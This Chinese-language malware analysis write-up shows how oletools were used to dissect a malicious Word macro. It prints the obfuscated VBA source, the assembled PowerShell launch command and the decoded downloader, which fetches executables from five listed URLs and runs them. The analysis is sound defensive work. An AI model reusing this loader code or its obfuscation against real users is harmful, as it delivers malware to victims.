1.什么是OLE
Object Linking and Embedding,对象连接与嵌入,简称OLE技术。OLE 不仅是桌面应用程序集成,而且还定义和实现了一种允许应用程序作为软件“对象”。Office办公组件都可以使用OLE技术来嵌入对象或者组件程序。
2.oletools
python-oletools是一款分析Office文件与其OLE文件结构的工具套件。
3.样本分析
先用strings查看下样本的可读字符串,出现超长的字符串需要引起注意。
image.png
利用oletools工具里的mraptor(macrorapter)查看是否可疑。mraptor通过启发式方法检测大多数恶意VBA宏,不同于杀毒引擎检测特征码。当发现文档自动执行触发器和写入文件系统或内存操作,或执行VBA上下文等操作时会判断为恶意宏。
image.png
利用oletools工具里的oletimes提取OLE文件中所有流和存储的创建和修改时间。时间信息可以帮助我们掌握基础的IOC信息,如果创建时间距离安全事件发生时间不长则可能定义为一个新的IOC。
image.png
利用oletools工具里的oledir查看文档中流结构基本信息。
image.png
利用oletools工具里的olemeta查看文档中的OLE所有扇区的映射。
image.png
利用oletools工具里的olevba提取宏代码,olvba是一个解析OLE和OpenXML文件的工具,可以检测VBA宏是否可疑,检查方式通过提取源代码以及通过反沙盒和反虚拟化技术使用的关键字以及潜在的IOC(IP地址,URL,可执行文件名等)。还可以检测和解码几种常见的混淆方法,包括十六进制,反转字符串,base64,dridex,VBA表达式,并从解码字符串中提取IOC。
image.png
image.png
提取VBA源代码:
Function lGUchPFGL()
KWFtYdDTon =
Mid("9VK6EAOABfADUAOAAtADEAMQA2AEkAMQAwADEAcAAxADAAOQBwADEAMQAyAHIAMwAyAC0ANAAzAEkAMwAyAHAAMwA5AHIAOQAyAF8AMwA5AF8AMwAyAEUANAAzAEcAMwAyAHIAMwA2AH4AMQAxADAARwA5ADcAfgAxADAAOQBJADEAMAAxkfAvpdThGNmJAk1Em3iz",
5, 174)
sZKCpRKm =
Mid("2AxADAANAAhADEAMQA2AEkAMQAxADYASQAxADEAMgAtADUAOABfADQANwAhADQANwBJADEAMQA5AH4AMQAwADgAcgA5ADcAfgAxADEANQBfADEAMQAwACEAMQAyADEAcgAxADEAdbivsbpqXaKwqLZ124",
2, 134)
hnSJnXVddhP = Mid("iYru3iLF0lcset
%RwUFwBXjE%=w^er^s&&set %ZQstbfFvY%=owZnERPJb&&set
%lGUchPFGL%=p^o&&set %TjISFAKwa%=fGonLAzNKos8", 12, 97)
abJcf = Mid("icRriEn5J8z7uqKjD19AF8AMQAyADAALQA2ADUAXwA0ADcAXwA0ADznfX5NfzhPTX7Luoz", 20, 34)
KLGHFbprUvc = Mid("0fLCkYANAByADEAMAA4AC0AMQAxADUAfgAzADIARQA2ADEAIQAzADIARQAzADkARQpMEcOtoINM", 7, 59)
jMNFtihSl = Mid("zxAHAAMQAwADkALQA0ADcAVwA4ADIAVwA5ADkAfgA4ADYAIQA0ADcRDvZC9SBpibhIYWJDIZMQD", 2, 52)
zncSQdHYUQu
=
Mid("q9DEAMAA5AFcAMwAyAF8ANgAxAF8AMwAyAHIAMQAxADAASQAxADAAMQBHADEAMQA5AEkANAA1AFcAMQAxADEARwA5ADgAX8W3uwC4MzEkoBET8tPCp4nY4",
3, 92)
wiEdrTI =
Mid("4OKdislUfKcvGXi8IwjGHodEoQA3AEcAMQAxADQAIQAxADAAOABXADQANgAtADgANAB+ADEAMQAxAC0AOAAzAF8AMQAxADYAXwAxADEANAAhADEAMAA1AHAAMQAxADAASQAxADAAMwBB54s81Yu0v6iV",
26, 114)
hEmkHuQ =
Mid("3JNw9z72caTAxADAAMAAhADEAMQA3AEkAMQAxADEASQAxADEAMAAtADEAMAAzACEANAA2AH4AMQAxADgASQAxADEAMABfADQANwBwADcAMwBFADEAMQA5AC0ANwA0AEkAMQAxADAASQA3ADAASQA0ADcAfgA0ADQASQAxADAANAB+ADEAMQA2AHIAMQAxADYAfgAxADENdaL6AdkH",
12, 189)
HUZCjtLV =
Mid("s0rMFdiJRA2AFcAMQAwADEAfgA0ADUAXwAxADAANAB+ADEAMQAxAEUAMQAxADUARQAxADEANgBwADMAMgBHADMANgByADkANQBXADQANgBwADUO",
10, 100)
DtDDVX = Mid("iADMAVwAxADEAMgAhADEAMAA4AC0AMQAwADUASQAxADEANgB+ADQAMAByAD6sWV7pUTliRpB6AzQwKs10O074UF", 2, 58)
cbwMNswjSic = Mid("2wAxADAANgAtADEAMAAxAEcAOQA5AF8AMQAxADYAXwAioQWqQoXmvhjWwPz0cYXbRZ8o", 2, 42)
UYiPjvIHhM
=
Mid("j32DEAMQA2AEUAMQAxADYAVwAxADEAMgBXADUAOAByADQANwBJADQANwB+ADkANwByADEAMAAzAH4AMQAwADEALQAxADEAMABXADEAMQA2AEkAMQAxADcAIQAxADEANABXADkANwBfADQANQAhADEAMAASFoOz97QljDiMj7Fnq",
4, 150)
qUazXUz = Mid("DsqAxADAAMQB+ADEAMQA1AFcAMQAxADUARQAzADIAcAAzADYARQAxADEAMgBFADkANwBFADEAMQA2AHIAMQAwADQAcs8qiztOXi", 4, 87)
fGYhd = Mid("vhTMwBwADUAMwAhADUAMQBHADUANAByADQAMQB+ADUAORjzf8Dzz", 4, 41)
bwDfKEDvnK = Mid("7Vtu1rl0cD1HMAaABvAG0ARQBbADIAMQBdACsAJABQAFMASABvAG0AZQBbADMAMABdACsAJwBYACcAKQawDibJ8", 12, 69)
AqwZqJJ
=
Mid("KTN3VR6zNQAwADgAfgAxADAANQBFADEAMAAxAHAAMQAxADAAcAAxADEANgBXADMAMgByADYAMQAtADMAMgBXADEAMQAwAH4AMQAwADEARwAxADEAOQByADQANQBXADEAMQAxAHIAOQA4AH4AMQAwADYAXwAxADAAMQB+ADkAOQBXADEAMQA2AEcAMwAyAF8AOvBOKCo",
10, 184)
LiBqwPV =
Mid("F07N96WQHoofVXtiQBzwK3SfJYShmWAAMQBwADEAMgAzACEAMQAxADYAfgAxADEANABfADEAMgAxAEkAMQAyADMAcgAzADYASQAxADEAOQBfADEAMAAxAEUAOQA4ACEAOQA5ACEAMQAwADgAcgAxADAANQBwADEAMAAxAC0AMQAxADAAcgAxADEANgBHSSLU",
32, 156)
SoXERffzLNj =
Mid("9Yi7sCwjIzuXTMaKfqdFnRzAoACgAIAAnADMANgAhADEAMQA5AH4AMQAxADUAcAA5ADkASQAxADEANABXADEAMAA1AFcAMQAxADIAVwAxADEANgBHADMAMzfRsvpMAzau",
24, 95)
kFwiHiljl =
Mid("1zfPmBvDFiDsdOIHADAANQBXADkANwBFADEAMQA0AH4AMQAxADYAcgA0ADYAIQA5ADkAXwAxADEAMQBwADEAMAA5AHAANAA3AHAANwA2VMAhfHZwT",
17, 88)
dqwLCiY =
Mid("f6rDcAOQAtADEAMQAzAC0AOAA0AEUAMQAyADEAcAA0ADcASQA0ADQAIQAxADAANABHADEAMQA2AEkAMQAxADYASQAxADEAMgB+ADUAOABHADQANwBwADQANwBJADEAMAA1AC0AMQAxADAAXwAxADEAMwBJADEAMAA1AHIAMQAwADgALQA5ADcAfgA5ADgAVwAxGPMt5QKmuiAT",
4, 191)
YzRnLMXLt =
Mid("NdTqpYdLb8WbrJtt8Th1KdT7JpqY8uHFzBqAH4AMQAxADAAcgAzADIARQAzADYAcAAxADEANwAtADEAMQA0AEkAMQAwADgAVwAxADEANQBFADQ5XV",
36, 75)
aBNiGIIAVn = Mid("EGkpwADQALQ8Jdhvt0AFro1UhsBkDES9RFZBZ", 5, 7)
SRrRL = Mid("p2AtADEAMQAwAHIAMQAxADYASQA1ADkAVwAzADYAVwAxADEANABFADkANwByADEAMQAwAF8AMQAwADAAXwAxADEAMQBXAoI82cU1bY", 3, 91)
IjXwSLEB = Mid("Fv2OATtMP6lHj3EB+ADEAMsnUj68E8Pb9pw", 16, 7)
wRjLjhk = Mid("zKDs4uR6ZiRgAnACcAKQA=aRiU40DzqR7uPTdpfXk", 12, 11)
ioKGvDI = Mid("nMNAjERAE4w8du4EsNZR0AiEzRQARQAxADAANAAtADEAMQA2AF8AMQAxDU1soYbR", 27, 30)
WDJKGIiwHUu
=
Mid("JvIMriS2vNtGmLJADQANgBJADYAOAAhADEAMQAxAEkAMQAxADkAcgAxADEAMAByADEAMAA4AF8AMQAxADEAcAA5ADcAcAAxADAAMABFADcAMABJADEAMAA1AEcAMQAwADgAfgAxADAAMQBwADQAMABfADMANgBfADEAMNXf2KZ05Q",
15, 150)
sCPDkiJju =
Mid("SutQBfADMANgBwADEAMQAyAF8AOQA3AH4AMQAxADYAcAAxADAANABfADMAMgByADYAMQBJADMAMgAtADMANgByADEA89MFjjj52tB4ijVL",
4, 87)
wwXDnZjw =
Mid("ovADYASQAxADEAMgB+ADUAOABXADQANwAhADQANwBXADEAMQA2AHIAMQAxADQASQAxADEANwBXADEAMQAwAH4AMQAwADMALQAxADEANgB+ADkANwBwADEAMAA5ACEAMQAxADYAVwAxADAAMAByADEAMQA2AFcAMQAxADYAcgA5ADgAIQAxADAANQAtADEAMQAwAEUAMQAiNPA9cWCcQOSHs3XTEsm",
3, 199)
tXnLIoGLHvd =
Mid("Bn2AMgB+ADUAOAAhADQANwBJADQANwByADkAOAAhADEAMAA1AEUAMQAwADcAIQA5ADcAcgAxADEAMAAtADrARBv9V0FhZYsT44iwcBuSU05s9FfiWs",
4, 79)
HAZhcP =
Mid("iTz04dTvUDELqZz4wiXoBWWUuLLdILLbYXozCcjk%=fWbOiZFVf&&!%lGUchPFGL%!!%RwUFwBXjE%!!%BXTAMUmbU%!
-e JgAoACAAJABwAzBG", 32, 78)
kKbvio =
Mid("NAMQBfADkAOABXADEAMQA0AFcAOQA3AHAAMQAyADIAfgA0ADYARwAxADEAMgBHADEAMAA4AHIANAA3AFcAMQAwADYARwA4ADUAXwAxADAAOQBXARwEmAWnB0rZR",
3, 109)
MJHlahRaFY =
Mid("18oHD2CMzLKwvo7S6z3zlAAzAEkAMQAyADEARwAxADEANQAhADEAMQA2AFcAMQAwADEALQAxADAAOQBwADQANgBJADcAOABwADEAMAAxAEUAMQAxADYAIQA0ADYAIQA4ADcARQAxADAAMQB+ADkAOAAtADYANwBfADEAMAA4AEUAMQAwADUAVwAxADAAMQRvBFXhF39IL5Q6F",
22, 169)
DhLXTIvQWVQ =
Mid("TXD6JHlrVazNd1QAwADIAVwAxADEAMQBXADEAMQA0AHIAMQAwADEARwA5ADcAfgA5ADkASQAxADAANABXADQAMABfADMANgAtADEAMQA3AEUAMQAxADQARQAxADAAOABwmJuq",
15, 115)
JfdSjoV =
Mid("WCZWOmKLzRNozNo1AwivjEAA4AFcAMQAwADgARwA1ADkAIQAzADYAVwAxADEAOQBJADEAMAAxAHAAOQA4AFcAOQA5AHAAMUppuZGSwK1IO5wLsG",
23, 72)
NTEKKsUWkd =
Mid("SMYApqnIL8MSummf4AC0AMQAwADUAXwAxADEAOAAtADEAMAA1AHAAMQAxADAAcAAxADAAMwBJADQANgAtADEAMQA1AF8AMQAwADcAVwA0ADcAXwA5ADAAcgA0ADcAXwAzADkAXwA0ADYAIQA4dkr899CUL4vVDTdit6s",
17, 129)
uDlLoVB = Mid("6aVVzmoFjtHADMAMgBHADEAMAA1EX9313IK", 12, 16)
IzYua
=
Mid("D6a692jtjoDAMAA2AEcAMQAwADEAXwA5ADkAcAAxADEANgBHADMAMgBfADgANwBwADgAMwBJADkAOQBFADEAMQA0ACEAMQAwADUAXwAxADEAMgBXADEAMQA2AF8ANAA2AHIAOAAzAEkAMQAwADQAcAAxADAAMQiinfq42PlZWdXRYiMncvdj",
12, 147)
pWjEMM = Mid("GblAgBHADQANQBHADgAMABXADEAMQA0AC0AMQAxADEAXwA5ADkAIQ5qbWqbh5iI3N2ZWGi4ks", 5, 49)
FhTNRuXZEhu
=
Mid("jANgAtADEAMQA0AC0AOQA3AEcAMQAxADAAIQAxADAAMAByADEAMQAxAHIAMQAwADkAXwA0ADYAcgAxADEAMAB+ADEAMAAxAEUAMQAyADAAcAAxADEANgBJADQAMAB+ADQAOQBXADQANABFADMAMgBHADUANABHADUA1MrEpslWGlpo9r9iwWriKOS",
2, 161)
HEVwFEoV =
Mid("vlZ1qR6BAUJCRkK+ADQAMAAtADQAMQB+ADQANAAtADMAMgByADMANgBFADEAMQAyAEkAOQA3AEkAMQAxADYASQAxADAANAAhADQAMQBXADUAOQAhADgAMwB+ADEAMQA2AFcAOQA3AC0AMQAxADQAcgAxADEANDXPu",
16, 142)
ZpJiPK =
Mid("wsd81Dw8zADIARwAxADEANAB+ADkANwBXADEAMQAwAC0AMQAwADAARQAxADEAMQBFADEAMAA5AH4ANQA5AHIAMwA2AH4AMQAxADcARwAxADEcR",
9, 100)
zwjaNTXzh =
Mid("uiHPBhgBHADYAMQBwADMAMgAhADEAMQAwAEcAMQAwADEARwAxADEAOQBFADQANQAhADEAMQAxAHIAOQA4AFcAMQAwADYASQAxADAAMQAhADkAOQBHADEAMQA2AF8AMwAyAC0ANAAZEfwX3",
7, 130)
tFrEjjOGmhj = Mid("anz6bzZmzKqwiWNFEoDJJzVCkp71AHIANgA3AHAAMQAxADEAcAAxADAAOQAtADcAOQByADkAOAByADEiZ1w", 28, 52)
HGXnj = Mid("1tzO&&set %BXTAMUmbU%=hel^l&&set %TwDzq0", 5, 30)
zIcBjSnbNcL
=
Mid("hRBswJpBii1vOcKQuYAOQByADEAMgAwAEcAOQA5AF8AMQAwADEAXwAxADEAMgAtADEAMQA2AEkAMQAwADUAfgAxADEAMQB+ADEAMQAwAEUANAA2AEkANwA3ACEAMQAwADEAcAAxADEANQAhADEAMQA1AHAAOQA3AH4AMQAwADMAcAAxADAAMQBJADUAOQBwADEAMgA1AC0AMo1TpcWwrp0EwcfXT",
18, 187)
isLUpmYjt =
Mid("UNZTvNZnu1qncHmBcNX3zQAyADUAJwAuAHMAUABMAEkAdAAoACAAJwBfACEAVwBwAEkALQB+AHIARwBFACcAIAApACAAfABGAG8AUgBFAEEAYwBIAC0AbwBiAGoARQBDAHQAIAB7ACgAIABbAEkAbgB0AF0AIAAkAF8AIAAtAGEAcwBbAEMASABhAFIAXQApACAAfQApAC0AagBvAEkATZOOwsdjQYOZ12LN3aD",
22, 192)
FCHEwwpc =
Mid("NQT2pfPun3AHJjLkXu2w2KzNjYDkZMAOQBfADQANABfADMAOQAhADQAMQB+ADUAOQBXADMANgBJADEAMQAwAEUAOQA3AF8AMQAwADkALQAxADAAMQB+ADMAMgBfADYAMQBXADMAMgBFADMCsff",
30, 113)
HcfaUs =
Mid("XjQ1qCgA1ADkASQA5ADgAfgAxADEANABJADEAMAAxAF8AOQA3ACEAMQAwADcALQA1ADkAVwAxADIANQAhADkAOQB+ADkANwBXADEAMQA2AC0AOQA5AEUAMQAwADQASQAxADIAMwBJADEAMQA5AEkAMQAxADQAcgAxADAANQB+ADEAMQi6RsnpsjEJLNHsvaz1Yvd1w1cQp",
7, 169)
vwYiNrWoCC = Mid("aGUz2qaZhRAfgA0ADQAIQAxADAANABJA8iYvEtjNqnrPGm0w", 11, 22)
nQJcjaCpQW
=
Mid("iGarfvv0Ij2q06YSdv5nMlWofEAMAAxAEcAMQAxADQAVwAxADAAOABJADEAMAA1AHAAMQAxADgAXwAxADAAMQBfADQANgAtADkAOQBfADEAMQAL6",
26, 85)
TUPqi = Mid("siZUCM6h5Q93QUiOF4iPGXwMAAxAEkAMQAxADAARQAxADPV", 24, 22)
bSPpO
=
Mid("0S5cjiACEAMwAyAF8ANAAzAC0AMwAyAH4AMwA5AEUANAA2AC0AMQAwADEARQAxADIAMABJADEAMAAxAHIAMwA5AFcANQA5AEkAMYEMdclGjivwo4pzHdNRZi",
7, 93)
Shell$ dtDtjWoad + Chr(34) + hnSJnXVddhP + HGXnj + HAZhcP +
bwDfKEDvnK + SoXERffzLNj + zwjaNTXzh + tFrEjjOGmhj + IzYua + IjXwSLEB +
JfdSjoV + AqwZqJJ + MJHlahRaFY + SRrRL + zncSQdHYUQu + cbwMNswjSic +
ZpJiPK + KLGHFbprUvc + sZKCpRKm + kKbvio + dqwLCiY + kFwiHiljl + abJcf +
ioKGvDI + wwXDnZjw + aBNiGIIAVn + hEmkHuQ + tXnLIoGLHvd + nQJcjaCpQW +
jMNFtihSl + vwYiNrWoCC + UYiPjvIHhM + NTEKKsUWkd + DtDDVX + FCHEwwpc +
FhTNRuXZEhu + fGYhd + sCPDkiJju + TUPqi + KWFtYdDTon + bSPpO +
DhLXTIvQWVQ + uDlLoVB + YzRnLMXLt + LiBqwPV + WDJKGIiwHUu + wiEdrTI +
HEVwFEoV + pWjEMM + qUazXUz + HcfaUs + HUZCjtLV + zIcBjSnbNcL +
isLUpmYjt + wRjLjhk, 0
End Function
宏代码中主要使用多个Mid函数取子字符串拼接,所以使用office内置的宏编辑器将代码简化。
image.png
简化后的代码:
Shell$ "set
%RwUFwBXjE%=w^er^s&&set %ZQstbfFvY%=owZnERPJb&&set
%lGUchPFGL%=p^o&&set %TjISFAKwa%=fGonLAzNK&&set
%BXTAMUmbU%=hel^l&&set %bYXozCcjk%=fWbOiZFVf&&!%lGUchPFGL%!!%RwUFwBXjE%!!%BXTAMUmbU%!
-e
JgAoACAAJABwAHMAaABvAG0ARQBbADIAMQBdACsAJABQAFMASABvAG0AZQBbADMAMABdACsAJwBYACcAKQAoACgAIAAnADMANgAhADEAMQA5AH4AMQAxADUAcAA5ADkASQAxADEANABXADEAMAA1AFcAMQAxADIAVwAxADEANgBHADMAMgBHADYAMQBwADMAMgAhADEAMQAwAEcAMQAwADEARwAxADEAOQBFADQANQAhADEAMQAxAHIAOQA4AFcAMQAwADYASQAxADAAMQAhADkAOQBHADEAMQA2AF8AMwAyAC0ANAA1AHIANgA3AHAAMQAxADEAcAAxADAAOQAtADcAOQByADkAOAByADEAMAA2AEcAMQAwADEAXwA5ADkAcAAxADEANgBHADMAMgBfADgANwBwADgAMwBJADkAOQBFADEAMQA0ACEAMQAwADUAXwAxADEAMgBXADEAMQA2AF8ANAA2AHIAOAAzAEkAMQAwADQAcAAxADAAMQB+ADEAMAA4AFcAMQAwADgARwA1ADkAIQAzADYAVwAxADEAOQBJADEAMAAxAHAAOQA4AFcAOQA5AHAAMQAwADgAfgAxADAANQBFADEAMAAxAHAAMQAxADAAcAAxADEANgBXADMAMgByADYAMQAtADMAMgBXADEAMQAwAH4AMQAwADEARwAxADEAOQByADQANQBXADEAMQAxAHIAOQA4AH4AMQAwADYAXwAxADAAMQB+ADkAOQBXADEAMQA2AEcAMwAyAF8AOAAzAEkAMQAyADEARwAxADEANQAhADEAMQA2AFcAMQAwADEALQAxADAAOQBwAD
QANgBJADcAOABwADEAMAAxAEUAMQAxADYAIQA0ADYAIQA4ADcARQAxADAAMQB+ADkAOAAtADYANwBfADEAMAA4AEUAMQAwADUAVwAxADAAMQAtADEAMQAwAHIAMQAxADYASQA1ADkAVwAzADYAVwAxADEANABFADkANwByADEAMQAwAF8AMQAwADAAXwAxADEAMQBXADEAMAA5AFcAMwAyAF8ANgAxAF8AMwAyAHIAMQAxADAASQAxADAAMQBHADEAMQA5AEkANAA1AFcAMQAxADEARwA5ADgAXwAxADAANgAtADEAMAAxAEcAOQA5AF8AMQAxADYAXwAzADIARwAxADEANAB+ADkANwBXADEAMQAwAC0AMQAwADAARQAxADEAMQBFADEAMAA5AH4ANQA5AHIAMwA2AH4AMQAxADcARwAxADEANAByADEAMAA4AC0AMQAxADUAfgAzADIARQA2ADEAIQAzADIARQAzADkARQAxADAANAAhADEAMQA2AEkAMQAxADYASQAxADEAMgAtADUAOABfADQANwAhADQANwBJADEAMQA5AH4AMQAwADgAcgA5ADcAfgAxADEANQBfADEAMQAwACEAMQAyADEAcgAxADEAMQBfADkAOABXADEAMQA0AFcAOQA3AHAAMQAyADIAfgA0ADYARwAxADEAMgBHADEAMAA4AHIANAA3AFcAMQAwADYARwA4ADUAXwAxADAAOQBXADcAOQAtADEAMQAzAC0AOAA0AEUAMQAyADEAcAA0ADcASQA0ADQAIQAxADAANABHADEAMQA2AEkAMQAxADYASQAxADEAMgB+ADUAOABHADQANwBwADQANwBJADEAMAA1AC0AMQAxADAAXwAxADEAMwBJADEAMAA1AHIAMQAwADgALQA5ADcAfgA5ADgAVwAxADAANQBXADkANwBFADEAMQA0AH4AMQAxADYAcgA0ADYAIQA5ADkAXwAxADEAMQBwADEAMAA5AHAANAA3AHAANwA2AF8AMQAyA
DAALQA2ADUAXwA0ADcAXwA0ADQARQAxADAANAAtADEAMQA2AF8AMQAxADYASQAxADEAMgB+ADUAOABXADQANwAhADQANwBXADEAMQA2AHIAMQAxADQASQAxADEANwBXADEAMQAwAH4AMQAwADMALQAxADEANgB+ADkANwBwADEAMAA5ACEAMQAxADYAVwAxADAAMAByADEAMQA2AFcAMQAxADYAcgA5ADgAIQAxADAANQAtADEAMQAwAEUAMQAwADQALQAxADAAMAAhADEAMQA3AEkAMQAxADEASQAxADEAMAAtADEAMAAzACEANAA2AH4AMQAxADgASQAxADEAMABfADQANwBwADcAMwBFADEAMQA5AC0ANwA0AEkAMQAxADAASQA3ADAASQA0ADcAfgA0ADQASQAxADAANAB+ADEAMQA2AHIAMQAxADYAfgAxADEAMgB+ADUAOAAhADQANwBJADQANwByADkAOAAhADEAMAA1AEUAMQAwADcAIQA5ADcAcgAxADEAMAAtADEAMAAxAEcAMQAxADQAVwAxADAAOABJADEAMAA1AHAAMQAxADgAXwAxADAAMQBfADQANgAtADkAOQBfADEAMQAxAHAAMQAwADkALQA0ADcAVwA4ADIAVwA5ADkAfgA4ADYAIQA0ADcAfgA0ADQAIQAxADAANABJADEAMQA2AEUAMQAxADYAVwAxADEAMgBXADUAOAByADQANwBJADQANwB+ADkANwByADEAMAAzAH4AMQAwADEALQAxADEAMABXADEAMQA2AEkAMQAxADcAIQAxADEANABXADkANwBfADQANQAhADEAMAA4AC0AMQAwADUAXwAxADEAOAAtADEAMAA1AHAAMQAxADAAcAAxADAAMwBJADQANgAtADEAMQA1AF8AMQAwADcAVwA0ADcAXwA5ADAAcgA0ADcAXwAzADkAXwA0ADYAIQA4ADMAVwAxADEAMgAhADEAMAA4AC0AMQAwADUASQAxADEANgB+ADQAMABy
ADMAOQBfADQANABfADMAOQAhADQAMQB+ADUAOQBXADMANgBJADEAMQAwAEUAOQA3AF8AMQAwADkALQAxADAAMQB+ADMAMgBfADYAMQBXADMAMgBFADMANgAtADEAMQA0AC0AOQA3AEcAMQAxADAAIQAxADAAMAByADEAMQAxAHIAMQAwADkAXwA0ADYAcgAxADEAMAB+ADEAMAAxAEUAMQAyADAAcAAxADEANgBJADQAMAB+ADQAOQBXADQANABFADMAMgBHADUANABHADUAMwBwADUAMwAhADUAMQBHADUANAByADQAMQB+ADUAOQBfADMANgBwADEAMQAyAF8AOQA3AH4AMQAxADYAcAAxADAANABfADMAMgByADYAMQBJADMAMgAtADMANgByADEAMAAxAEkAMQAxADAARQAxADEAOABfADUAOAAtADEAMQA2AEkAMQAwADEAcAAxADAAOQBwADEAMQAyAHIAMwAyAC0ANAAzAEkAMwAyAHAAMwA5AHIAOQAyAF8AMwA5AF8AMwAyAEUANAAzAEcAMwAyAHIAMwA2AH4AMQAxADAARwA5ADcAfgAxADAAOQBJADEAMAAxACEAMwAyAF8ANAAzAC0AMwAyAH4AMwA5AEUANAA2AC0AMQAwADEARQAxADIAMABJADEAMAAxAHIAMwA5AFcANQA5AEkAMQAwADIAVwAxADEAMQBXADEAMQA0AHIAMQAwADEARwA5ADcAfgA5ADkASQAxADAANABXADQAMABfADMANgAtADEAMQA3AEUAMQAxADQARQAxADAAOABwADMAMgBHADEAMAA1AH4AMQAxADAAcgAzADIARQAzADYAcAAxADEANwAtADEAMQA0AEkAMQAwADgAVwAxADEANQBFADQAMQBwADEAMgAzACEAMQAxADYAfgAxADEANABfADEAMgAxAEkAMQAyADMAcgAzADYASQAxADEAOQBfADEAMAAxAEUAOQA4ACEAOQA5ACEAMQAwADgAcgAxADAANQB
wADEAMAAxAC0AMQAxADAAcgAxADEANgBJADQANgBJADYAOAAhADEAMQAxAEkAMQAxADkAcgAxADEAMAByADEAMAA4AF8AMQAxADEAcAA5ADcAcAAxADAAMABFADcAMABJADEAMAA1AEcAMQAwADgAfgAxADAAMQBwADQAMABfADMANgBfADEAMQA3AEcAMQAxADQAIQAxADAAOABXADQANgAtADgANAB+ADEAMQAxAC0AOAAzAF8AMQAxADYAXwAxADEANAAhADEAMAA1AHAAMQAxADAASQAxADAAMwB+ADQAMAAtADQAMQB+ADQANAAtADMAMgByADMANgBFADEAMQAyAEkAOQA3AEkAMQAxADYASQAxADAANAAhADQAMQBXADUAOQAhADgAMwB+ADEAMQA2AFcAOQA3AC0AMQAxADQAcgAxADEANgBHADQANQBHADgAMABXADEAMQA0AC0AMQAxADEAXwA5ADkAIQAxADAAMQB+ADEAMQA1AFcAMQAxADUARQAzADIAcAAzADYARQAxADEAMgBFADkANwBFADEAMQA2AHIAMQAwADQAcgA1ADkASQA5ADgAfgAxADEANABJADEAMAAxAF8AOQA3ACEAMQAwADcALQA1ADkAVwAxADIANQAhADkAOQB+ADkANwBXADEAMQA2AC0AOQA5AEUAMQAwADQASQAxADIAMwBJADEAMQA5AEkAMQAxADQAcgAxADAANQB+ADEAMQA2AFcAMQAwADEAfgA0ADUAXwAxADAANAB+ADEAMQAxAEUAMQAxADUARQAxADEANgBwADMAMgBHADMANgByADkANQBXADQANgBwADYAOQByADEAMgAwAEcAOQA5AF8AMQAwADEAXwAxADEAMgAtADEAMQA2AEkAMQAwADUAfgAxADEAMQB+ADEAMQAwAEUANAA2AEkANwA3ACEAMQAwADEAcAAxADEANQAhADEAMQA1AHAAOQA3AH4AMQAwADMAcAAxADAAMQBJADUAOQBwADEAMg
A1AC0AMQAyADUAJwAuAHMAUABMAEkAdAAoACAAJwBfACEAVwBwAEkALQB+AHIARwBFACcAIAApACAAfABGAG8AUgBFAEEAYwBIAC0AbwBiAGoARQBDAHQAIAB7ACgAIABbAEkAbgB0AF0AIAAkAF8AIAAtAGEAcwBbAEMASABhAFIAXQApACAAfQApAC0AagBvAEkATgAnACcAKQA=
简化后代码分成三个部分: Shell通常被用来执行系统命令。
image.png
set串中是利用命令提示符中环境变量组合来执行绝对路径下的powershell。
image.png
** -e后面的字符串末尾有个“=”,判断为base64编码,解码后为:**
&($pshomE[21]+$PSHome[30]+'X')(('36!119~115p99I114W105W112W116G32G61p32!110G101G119E45!111r98W106I101!99G116_32-45r67p111p109-79r98r106G101_99p116G32_87p83I99E114!105_112W116_46r83I104p101~108W108G59!36W119I101p98W99p108~105E101p110p116W32r61-32W110~101G119r45W111r98~106_101~99W116G32_83I121G115!116W101-109p46I78p101E116!46!87E101~98-67_108E105W101-110r116I59W36W114E97r110_100_111W109W32_61_32r110I101G119I45W111G98_106-101G99_116_32G114~97W110-100E111E109~59r36~117G114r108-115~32E61!32E39E104!116I116I112-58_47!47I119~108r97~115_110!121r111_98W114W97p122~46G112G108r47W106G85_109W79-113-84E121p47I44!104G116I116I112~58G47p47I105-110_113I105r108-97~98W105W97E114~116r46!99_111p109p47p76_120-65_47_44E104-116_116I112~58W47!47W116r114I117W110~103-116~97p109!116W100r116W116r98!105-110E104-100!117I111I110-103!46~118I110_47p73E119-74I110I70I47~44I104~116r116~112~58!47I47r98!105E107!97r110-101G114W108I105p118_101_46-99_111p109-47W82W99~86!47~44!104I116E116W112W58r47I47~97r103~101-110W116I117!114W97_45!108-105_118-105p110p103I46-115_107W47_90r47_39_46!83W112!108-105I116~40r39_44_39!41~59W36I110E97_109-101~32_61W32E36-114-97G110!100r111r109_46r110~101E120p116I40~49W44E32G54G53p53!51G54r41~59_36p112_97~116p104_32r61I32-36r101I110E118_58-116I101p109p112r32-43I32p39r92_39_32E43G32r36~110G97~109I101!32_43-32~39E46-101E120I101r39W59I102W111W114r101G97~99I104W40_36-117E114E108p32G105~110r32E36p117-114I108W115E41p123!116~114_121I123r36I119_101E98!99!108r105p101-110r116I46I68!111I119r110r108_111p97p100E70I105G108~101p40_36_117G114!108W46-84~111-83_116_114!105p110I103~40-41~44-32r36E112I97I116I104!41W59!83~116W97-114r116G45G80W114-111_99!101~115W115E32p36E112E97E116r104r59I98~114I101_97!107-59W125!99~97W116-99E104I123I119I114r105~116W101~45_104~111E115E116p32G36r95W46p69r120G99_101_112-116I105~111~110E46I77!101p115!115p97~103p101I59p125-125'.sPLIt('_!WpI-~rGE' ) |FoREAcH-objECt {( [Int] $_ -as[CHaR]) })-joIN'')
PSHome[30]+'X',利用powershell下的环境变量取字符拼接为IEX,在powershell中为执行变量或函数的功能。
image.png
后面的字符串也用powershell解码出来就是:
$wscript = new-object -ComObject WScript.Shell;
$webclient = new-object System.Net.WebClient;
$random = new-object random;
$urls = 'http://wlasnyobraz.pl/jUmOqTy/,http://inqilabiart.com/LxA/,http://trungtamtdttbinhduong.vn/IwJnF/,http://bikanerlive.com/RcV/,http://agentura-living.sk/Z/'.Split(',');
$name = $random.next(1, 65536);
$path = $env:temp + '\' + $name + '.exe';foreach($url in $urls)
{try
{$webclient.DownloadFile($url.ToString(), $path);
Start-Process $path;break;
}
catch
{write-host $_.Exception.Message;}}
基本流程是:创建一个WScript.Shell对象和一个webclient对象,遍历$urls数组,从每个url中下载exe文件保存为随机文件名并执行。
在虚拟机中可以看到请求为404,地址已经失效。
image.png
4.总结
此恶意文档通过使用代码混淆,编码技术来逃避杀毒软件的检测,给分析带来了一定的阻碍,但是还原黑客攻击的手法还是比较原始的宏代码利用,所以只要对宏代码进行深入分析就能了解整个攻击过程。
参考:https://www.cnblogs.com/KevinGeorge/
https://medium.com/walmartlabs/evasive-vba-advanced-maldoc-techniques-1365e9373f80
